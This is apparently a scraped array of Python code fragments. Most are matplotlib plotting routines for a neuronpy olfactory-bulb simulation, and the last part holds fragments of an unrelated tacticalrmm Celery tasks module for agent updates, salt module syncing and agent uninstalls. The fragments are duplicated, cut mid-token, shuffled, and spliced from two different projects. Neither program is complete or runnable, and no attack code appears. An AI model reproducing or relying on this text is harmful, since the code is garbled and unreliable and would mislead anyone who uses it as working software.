xy=(1190, 1.28), xycoords='data', xytext=(1190,", "ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks", "schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair,", "i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4],", "markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def", "spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref],", "schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure,", "xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center')", "color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath],", "sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False)", "< xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue')", "'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark", "ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) # Glom", "gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False", "1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\", "marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color,", "= ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid,", "window=5) # idx = 0 # for i in mask_a: # if i", "linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay", "cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim)", "markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc],", "cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags =", "for i in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y =", "\\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break #", "breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time", "breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data',", "int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt =", "syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline')", "ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in", "onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\",", "gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.)", "color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite", "pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07,", "sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences,", "= 10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5)", "> 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\", "red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\", "Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) #", "fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue')", "range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005,", "format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none')", "= (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) #", "Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data',", "[0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot", "pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02,", "M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = []", "6 18:22:04 2011 @author: - \"\"\" import os import numpy from matplotlib import", "# Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o',", "syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for", "breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt = 1", "idx = 0 for b in breath_events: if b >= tstop: break else:", "250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span", "# for i in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o',", "yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color)", "= 0 for i in mask_b: if i == 1: if comp[idx] >=", "linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws =", "10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig,", "+= EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt =", "comp, window=5) # idx = 0 # for i in mask_a: # if", "event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1,", "= bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1]", "= spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red')", "color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in", "color='black') # Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events", "# raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx = 0 for i", "verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath],", "y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt", "data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in", "\\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5,", "for i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def", "range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc)", "ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([])", "xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15", "pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') #", "y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1,", "mask_b: if i == 1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]:", "from neuronpy.util import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path =", "bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx", "ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax,", "color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color,", "= fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax,", "color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule'])", "ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) #", "= numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5): data.append([]) for m", "# Mark delay interval for i in range(len(breath_events)): if breath_events[i] > 1400: span", "# pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig =", "1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for", "if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold',", "1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i", "'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path,", "'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0.,", "format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11))", "markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance", "numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt = 1 tstop =", "\\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft',", "in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data =", "numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale,", "[9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary", "return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i", "in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M =", "matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util", "tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red', 'input", "xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\",", "= syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--',", "linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white')", "ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data =", "marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10))", ".53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break", "dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule", "= 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101),", "horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025,", "y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o',", "for b in breath_events: if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt)", "Mark delay interval for i in range(len(breath_events)): if breath_events[i] > 1400: span =", "pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos", "numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if b >=", "= numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color)", "def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5),", "fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple',", "= numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101),", "\\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)): if breath_events[i]", "'stimdelayevents.txt')) data = [] for i in range(5): data.append([]) for m in M:", ".28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\", "idx += 1 idx = 0 for i in mask_b: if i ==", "1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple',", "def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5):", "= 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp =", "- cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color)", "import pyplot from neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util import", "sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False )", "cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27])", "markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax,", "i in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i", "linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top',", "for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): #", "analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim()", "break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] +=", "file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts =", "cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue')", "EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0,", "numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1.,", "draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\", "xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53," ]
[ "task from d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]):", "def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject, body, html, attachments)", "import task from d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None,", "<NAME> <<EMAIL>> # Created on Jun 30, 2012 # from celery.task import task", "# Copyright (c) 2012 feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>>", "# # @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 # from", "# from celery.task import task from d3status.mail import send_email @task def send_email_task(fr, to,", "on Jun 30, 2012 # from celery.task import task from d3status.mail import send_email", "celery.task import task from d3status.mail import send_email @task def send_email_task(fr, to, subject, body,", "# # Copyright (c) 2012 feilong.me. All rights reserved. # # @author: <NAME>", "@task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject, body, html,", "2012 # from celery.task import task from d3status.mail import send_email @task def send_email_task(fr,", "# @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 # from celery.task", "Copyright (c) 2012 feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>> #", "2012 feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>> # Created on", "from d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr,", "<<EMAIL>> # Created on Jun 30, 2012 # from celery.task import task from", "Created on Jun 30, 2012 # from celery.task import task from d3status.mail import", "rights reserved. # # @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012", "30, 2012 # from celery.task import task from d3status.mail import send_email @task def", "Jun 30, 2012 # from celery.task import task from d3status.mail import send_email @task", "All rights reserved. # # @author: <NAME> <<EMAIL>> # Created on Jun 30,", "d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to,", "utf-8 -*- # # Copyright (c) 2012 feilong.me. All rights reserved. # #", "(c) 2012 feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>> # Created", "feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>> # Created on Jun", "-*- coding: utf-8 -*- # # Copyright (c) 2012 feilong.me. All rights reserved.", "<gh_stars>100-1000 # -*- coding: utf-8 -*- # # Copyright (c) 2012 feilong.me. All", "send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject, body,", "-*- # # Copyright (c) 2012 feilong.me. All rights reserved. # # @author:", "@author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 # from celery.task import", "# -*- coding: utf-8 -*- # # Copyright (c) 2012 feilong.me. All rights", "from celery.task import task from d3status.mail import send_email @task def send_email_task(fr, to, subject,", "# Created on Jun 30, 2012 # from celery.task import task from d3status.mail", "reserved. # # @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 #", "import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject,", "coding: utf-8 -*- # # Copyright (c) 2012 feilong.me. All rights reserved. #" ]
[ "online = [i.salt_id for i in agents if i.status == \"online\"] chunks =", "no new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or r ==", "return q = Agent.objects.all() agents = [ i.pk for i in q if", "len(agents), 30)) for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk)", "def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents", "if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage", "return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent =", "packaging import version as pyver from django.conf import settings from tacticalrmm.celery import app", "agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail", "Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER)", "[i.salt_id for i in agents if i.status == \"online\"] chunks = (online[i :", "def uninstall_agent_task(salt_id): attempts = 0 error = False while 1: try: r =", "from django.conf import settings from tacticalrmm.celery import app from agents.models import Agent, AgentOutage", "or r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task", "salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split", "= settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if", "agents to not overload salt agents = Agent.objects.all() online = [i.salt_id for i", "in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i + 30]", "agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch", "= \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch = \"64\"", "WMI agents = Agent.objects.all() online = [ i.salt_id for i in agents if", "q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if pyver.parse(i.version) <", "AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage =", "q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i + 30] for", "\"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\"", "else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" )", "\"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, 